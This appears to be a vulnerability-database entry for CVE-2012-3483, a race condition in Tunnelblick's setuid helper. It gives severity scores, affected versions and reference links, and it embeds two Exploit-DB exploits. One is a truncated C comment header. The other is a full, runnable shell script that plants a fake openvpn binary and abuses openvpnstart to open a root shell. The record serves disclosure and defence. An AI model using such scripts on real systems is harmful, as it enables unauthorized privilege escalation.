CVE-2012-3483
Published 2012-08-26
CVE-2012-3483: Race condition in the runScript function in Tunnelblick 3.3beta20 and earlier allows local users to gain privileges by replacing a script file.
Priority: P4 · 23
Severity: medium, 6.2 (CVSS 2.0)
Vector: AV:L/AC:H/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 0.26% (17.8th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| | tunnelblick | <= 3.3beta20 | — |
No detection rules found.
Exploit-DB
Tunnelblick - Local Privilege Escalation (1)
exploitdb·2012-08-11
CVE-2012-3483 Tunnelblick - Local Privilege Escalation (1)
```c
/*
 * ==== Pwnnel Blicker ====
 * =                      =
 * =         zx2c4        =
 * =                      =
 * ========================
 *
 * Tunnel Blick, a widely used OpenVPN manager for OSX
 * comes with a nice SUID executable that has more holes
 * than you care to count. It's a treasure chest of local
 * roots. I picked one that looked interesting, and here
 * we have Pwnnel Blicker.
 *
 * Tunnel Blick will run any executable that has 744
 * permissions and is owned by root:root. Probably we
 * could find a way to exploit an already existing 744
 * executable, but this would be too easy. So instead, we
 * take advantage of a race condition between checking the
 * file permissions on the executable and actually running
 * it.
 *
 * Usage:
 * $ ./a.out
 * [+] Creating vulnerable directory.
 * /Users/zx2c4/Li
```
Exploit-DB
Tunnelblick - Local Privilege Escalation (2)
exploitdb·2012-08-11
CVE-2012-3485 Tunnelblick - Local Privilege Escalation (2)
```sh
#!/bin/sh
#### Pwnnel Blicker ####
#       for kids       #
#                      #
#         zx2c4        #
#                      #
########################
# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
# http://git.zx2c4.com/Pwnnel-Blicker/tree/
echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0
echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn
echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0
```
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2012-08/0122.html
http://code.google.com/p/tunnelblick/issues/detail?id=212
http://git.zx2c4.com/Pwnnel-Blicker/tree/pwnnel-blicker.c
http://www.openwall.com/lists/oss-security/2012/08/14/1